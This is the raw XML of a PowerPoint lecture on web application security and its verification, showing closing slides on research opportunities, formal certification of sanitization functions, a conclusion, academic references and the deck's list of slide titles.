              <a:t> Problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>for this class of programs is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>undecidable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Objectives and Challenges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Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>References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Research Opportunities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Advanced and integrated program analyses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Formal certification of Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Development methods (including language design) for secure Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A completely new and secure Web (beyond http-related protocols)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Business Opportunities: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Code Review/Analysis Service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560536"/>
            <a:ext cx="8229600" cy="5226050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This requires a combination of knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Program testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Review process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There are real and growing demands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A few industry and academic groups are building up their capabilities.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Toward Formal Certification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Current commercial code analysis tools are not precise enough and rely on competence of the programmer/reviewer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Ideally, every sensitive Web application should go through a thorough and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formal verification/certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>To be practical, one should probably focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>correctness of sanitization functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (which are functions that validate user’s input).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There are quite a few issues that need further research.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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Opportunities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Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>References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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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Conclusion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Web application security has drawn much attention from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>industry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>academia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Making Web applications secure requires a combination of expertise in different areas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This provides great opportunities for research/development collaboration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It should also create good opportunities for starting new businesses.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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Conclusion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References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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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Selected References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/>
              <a:t>Huang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Securing Web Application Code by Static Analysis and Runtime Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>WWW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>2004.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>Minamide,“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t> Approximation of Dynamically Generated Web Pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>WWW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>2005.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>Xie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> and Aiken, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Static Detection of Security Vulnerabilities in Scripting Languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>USENIX Security Symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> 2006.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Su and Wassermann, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>The Essence of Command Injection Attacks in Web Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>POPL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>2006.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Chess and West, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>Secure Programming with Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, Pearson Education, Inc. 2007.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Lam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Securing Web Applications with Static and Dynamic Information Flow Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>PEPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>2008.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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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Selected References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/>
              <a:t>Yu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Verification of String Manipulation Programs Using Multi-Track Automata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” Tech Report, UCSB, 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Yu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Generating Vulnerability Signatures for String Manipulating Programs Using Automata-based Forward and Backward Symbolic Analyses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>IEEE/ACM ICASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>2009. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>Kiezun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>et al.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>Automatic Creation of SQL Injection and Cross-Site Scripting Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0"/>
              <a:t>ICSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>OWASP, http://www.owasp.org/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The CVE Site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://cve.mitre.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The CWE Site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://cwe.mitre.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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err="1"/>
              <a:t>Yih-Kuen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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12254</TotalTime>
  <Words>4705</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>801</Paragraphs>
  <Slides>56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56</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="64" baseType="lpstr">
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>cmtt10</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Edge</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Web Application Security and Its Verification</vt:lpstr>
      <vt:lpstr>Software Safety vs. Security </vt:lpstr>
      <vt:lpstr>Caveats</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>How the Web Works</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Web Applications: Dynamic Contents</vt:lpstr>
      <vt:lpstr>Web Applications: Client-Side Script</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Vulnerable Web Applications</vt:lpstr>
      <vt:lpstr>A Common Vulnerability: SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Essence of SQL Injection</vt:lpstr>
      <vt:lpstr>Compromised Websites</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks</vt:lpstr>
      <vt:lpstr>What Changed from 2007 to 2010</vt:lpstr>
      <vt:lpstr>What Changed from 2010 to 2013</vt:lpstr>
      <vt:lpstr>What Changed from 2013 to 2017</vt:lpstr>
      <vt:lpstr>What Changed from 2017 to 2020</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection in PHP</vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection (cont.) </vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting in PHP</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting (cont.)</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting (cont.)</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Current Status</vt:lpstr>
      <vt:lpstr>An Example</vt:lpstr>
      <vt:lpstr>Control Flow Graph</vt:lpstr>
      <vt:lpstr>Dependency Graph (1/3)</vt:lpstr>
      <vt:lpstr>Dependency Graph (2/3)</vt:lpstr>
      <vt:lpstr>Dependency Graph (3/3)</vt:lpstr>
      <vt:lpstr>Alias</vt:lpstr>
      <vt:lpstr>Detecting Vulnerabilities by Taint Analysis</vt:lpstr>
      <vt:lpstr>Problems and Objectives</vt:lpstr>
      <vt:lpstr>Use of a Code Analysis Tool</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Challenges: Alias Analysis</vt:lpstr>
      <vt:lpstr>Challenges: Alias Analysis (cont.)</vt:lpstr>
      <vt:lpstr>Challenges: Strings and Numbers</vt:lpstr>
      <vt:lpstr>Challenges: A Theoretical Limitation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Research Opportunities</vt:lpstr>
      <vt:lpstr>Business Opportunities:  Code Review/Analysis Service</vt:lpstr>
      <vt:lpstr>Toward Formal Certification</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Selected References</vt:lpstr>
      <vt:lpstr>Selected References (cont.)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Talk at MFN 2010/05/14</dc:title>
  <dc:creator>tsay</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>595</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-06-21T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-16T06:07:13Z</dcterms:modified>
</cp:coreProperties>
</file>